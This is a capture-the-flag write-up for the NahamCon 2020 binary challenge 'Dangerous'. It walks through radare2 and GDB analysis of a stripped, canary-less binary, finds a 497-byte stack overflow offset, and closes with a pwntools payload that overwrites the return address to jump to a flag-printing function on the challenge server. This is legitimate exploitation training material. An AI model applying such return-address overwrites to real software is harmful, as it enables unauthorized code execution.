Tags: pwn binary 


### Solution Summary

Overflow the stack and overwrite the return address to execute the flag function.

### Walkthrough

The binary is a 64bits file with NX enabled.

$ pwn checksec dangerous
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

However it's a stripped binary which makes it harder to reverse engineer.

_Radare2_ finds the `main` address automaticaly but you can find it by yourself:

* Jump to the _entry point_
* Find the call to `__libc_start_main`
* The first parameter is `main` address

$ r2 -A dangerous
[0x004010f0]> pd 16
;-- section..text:
;-- rip:
/ 46: entry0 (int64_t arg3);
| ; arg int64_t arg3 @ rdx
| 0x004010f0 f30f1efa endbr64 ; [15] -r-x section size 757 named .text
| 0x004010f4 31ed xor ebp, ebp
| 0x004010f6 4989d1 mov r9, rdx ; arg3
| 0x004010f9 5e pop rsi
| 0x004010fa 4889e2 mov rdx, rsp
| 0x004010fd 4883e4f0 and rsp, 0xfffffffffffffff0
| 0x00401101 50 push rax
| 0x00401102 54 push rsp
| 0x00401103 49c7c0e01340. mov r8, 0x4013e0
| 0x0040110a 48c7c1701340. mov rcx, 0x401370
| 0x00401111 48c7c7d61140. mov rdi, main ; 0x4011d6
\ 0x00401118 ff15d22e0000 call qword [reloc.__libc_start_main] ; [0x403ff0:8]=0
0x0040111e f4 hlt
0x0040111f 90 nop
0x00401120 f30f1efa endbr64
0x00401124 c3 ret

In this case: `0x4011d6`.

Looking at the strings in the binary we find `./flag.txt`.

[0x004010f0]> iz
nth paddr vaddr len size section type string
1 0x000021f8 0x004021f8 17 18 .rodata ascii What's your name?
2 0x00002210 0x00402210 46 47 .rodata ascii Uh-oh... something's not right... good luck...
3 0x0000223f 0x0040223f 10 11 .rodata ascii ./flag.txt

There is a reference to this string at `0x401322`.

[0x004010f0]> axt 0x0040223f
(nofunc) 0x401322 [DATA] lea rdi, str.._flag.txt

Looking at this address we find a function starting at `0x0040130e` address.

[0x00401322]> s 0x401322
[0x00401322]> pd--5
0x0040130e f30f1efa endbr64
0x00401312 55 push rbp
0x00401313 4889e5 mov rbp, rsp
0x00401316 4881ec100200. sub rsp, 0x210
0x0040131d be00000000 mov esi, 0
0x00401322 488d3d160f00. lea rdi, str.._flag.txt ; 0x40223f ; "./flag.txt"
0x00401329 b800000000 mov eax, 0
0x0040132e e8adfdffff call sym.imp.open ; int open(const char *path, int oflag)
0x00401333 8945fc mov dword [rbp - 4], eax
0x00401336 488d8df0fdff. lea rcx, [rbp - 0x210]

Let's mark it as a function and call it _fcn.flag_.

[0x00401322]> s 0x0040130e # jump to start address
[0x0040130e]> af # analyse block as a function
[0x0040130e]> pdf
/ 93: fcn.0040130e ();
| ; var int64_t var_210h @ rbp-0x210
| ; var int64_t var_4h @ rbp-0x4
| 0x0040130e f30f1efa endbr64
| 0x00401312 55 push rbp
| 0x00401313 4889e5 mov rbp, rsp
| 0x00401316 4881ec100200. sub rsp, 0x210
| 0x0040131d be00000000 mov esi, 0
| 0x00401322 488d3d160f00. lea rdi, str.._flag.txt ; 0x40223f ; "./flag.txt"
| 0x00401329 b800000000 mov eax, 0
| 0x0040132e e8adfdffff call sym.imp.open ; int open(const char *path, int oflag)
| 0x00401333 8945fc mov dword [var_4h], eax
| 0x00401336 488d8df0fdff. lea rcx, [var_210h]
| 0x0040133d 8b45fc mov eax, dword [var_4h]
| 0x00401340 ba00020000 mov edx, 0x200 ; 512
| 0x00401345 4889ce mov rsi, rcx
| 0x00401348 89c7 mov edi, eax
| 0x0040134a e871fdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
| 0x0040134f 8b45fc mov eax, dword [var_4h]
| 0x00401352 89c7 mov edi, eax
| 0x00401354 e857fdffff call sym.imp.close ; int close(int fildes)
| 0x00401359 488d85f0fdff. lea rax, [var_210h]
| 0x00401360 4889c7 mov rdi, rax
| 0x00401363 e828fdffff call sym.imp.puts ; int puts(const char *s)
| 0x00401368 90 nop
| 0x00401369 c9 leave
\ 0x0040136a c3 ret
[0x0040130e]> afn fcn.flag # rename function to fcn.flag

This function opens `./flag.txt`, reads the content and puts it on the screen.
So we have to find a way to run this function.

Back to the `main` function, now using GDB, let's try to overflow the stack and
overwrite the return address.

$ gdb -q dangerous
gef➤ x/100i 0x4011d6
0x4011d6: endbr64
0x4011da: push rbp
0x4011db: mov rbp,rsp
0x4011de: sub rsp,0x620
0x4011e5: mov DWORD PTR [rbp-0x614],edi
0x4011eb: mov QWORD PTR [rbp-0x620],rsi
0x4011f2: mov rax,QWORD PTR [rip+0x2e67] # 0x404060 <stdout>
0x4011f9: mov ecx,0x0
0x4011fe: mov edx,0x2
0x401203: mov esi,0x0
0x401208: mov rdi,rax
0x40120b: call 0x4010d0 <setvbuf@plt>
0x4012e5: mov BYTE PTR [rbp-0x11],0x0
0x4012e9: lea rax,[rbp-0x210]
0x4012f0: mov rdi,rax
0x4012f3: call 0x401090 <puts@plt>
0x4012f8: mov rax,QWORD PTR [rip+0x2d59] # 0x404058
0x4012ff: mov rdi,rax
0x401302: call 0x401090 <puts@plt>
0x401307: mov eax,0x0
0x40130c: leave
0x40130d: ret

Set a _break point_ at `ret` instruction and feed the program with a pattern to
find the offset.

gef➤ pattern create 512
[+] Generating a pattern of 512 bytes
gef➤ b * 0x40130d
Breakpoint 2 at 0x40130d
gef➤ run
What's your name?
gef➤ x/gx $rsp
0x7fffffffe328: 0x6e63616161616161
gef➤ pattern search 0x6e63616161616161
[+] Searching '0x6e63616161616161'
[+] Found at offset 497 (little-endian search) likely

### Exploit

The exploit is just a padding of 497 bytes plus the address of `flag` function.

from pwn import *

#sh = process('./dangerous')
sh = remote('jh2i.com', 50011)

payload = b'A' * 497
payload += p64(0x40130e)


Original writeup (https://gitlab.com/rogeriobastos/ctf-write-ups/-/blob/master/2020/NahamCon_CTF/binary/Dangerous/README.md).